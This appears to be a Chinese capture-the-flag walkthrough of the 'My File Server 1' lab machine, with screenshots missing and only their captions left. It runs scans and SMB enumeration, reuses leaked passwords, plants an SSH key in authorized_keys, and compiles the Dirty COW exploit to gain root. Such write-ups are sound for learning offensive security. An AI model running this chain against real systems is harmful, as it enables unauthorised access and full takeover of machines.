环境配置

先导入虚拟机
my file server1_环境配置
设置网路为NAT,扫描iP

netdiscover -r 192.168.164.0/24

my file server1_用户密钥_02
靶机ip:192.168.164.183
kali:192.168.164.137

渗透测试

先扫描端口

nmap -sS -sV -T5 -A -p- 192.168.164.183

my file server1_环境配置_03
my file server1_模式匹配_04
开放了很多端口
访问80端口
my file server1_环境配置_05
没有什么特别的
再使用nikto扫描

nikto -h http://192.168.164.183

my file server1_配置文件_06
扫描到一个文件readme.txt,访问
my file server1_环境配置_07
获得了一个密码。
刚刚扫描发现445端口开放,使用smbmap对smb信息枚举
smbmap允许用户枚举整个域中的samba共享驱动器。列出共享驱动器,驱动器权限,共享内容,上载/下载功能,文件名自动下载模式匹配,甚至执行远程命令。

smbmap -H 192.168.164.183

my file server1_root权限_08
发现 sbmdata有读写权限,使用smbclient来连接。

smbclient //192.168.164.183/smbdata

用刚刚的密码进行连接
my file server1_模式匹配_09
把文件get下来
最后在secure中找到用户名和密码
my file server1_环境配置_10
用户:smbuser
密码:chauthtok
尝试用ssh登录
my file server1_配置文件_11
需要私钥
尝试ftp连接,密码为得到的rootroot1
my file server1_root权限_12
my file server1_配置文件_13
查看ssh配置文件
my file server1_root权限_14
my file server1_配置文件_15
发现用户密钥文件存放目录
my file server1_用户密钥_16
然后在smbuser用户下创建文件,伪造公钥和私钥创建连接

pwd
cd /home/smbuser
mkdir .ssh

my file server1_root权限_17
新打开一个窗口,创建公钥和私钥

ssh-keygen -t rsa

my file server1_root权限_18
使用命令把公钥和私钥复制下来

cp /root/.ssh/* ./

my file server1_模式匹配_19
然后上传公钥到.ssh/authorized_keys目录下
my file server1_配置文件_20
然后使用ssh连接,连接成功。
my file server1_root权限_21
然后查看内核,使用脏牛尝试提权

uname -a

my file server1_root权限_22
把脏牛文件上传到tmp目录下。
my file server1_用户密钥_23
编译运行脏牛脚本

gcc -pthread dirty.c -o dirty -lcrypt

my file server1_用户密钥_24
开始执行
my file server1_用户密钥_25
拿到root权限后进入root目录下获取flag
my file server1_用户密钥_26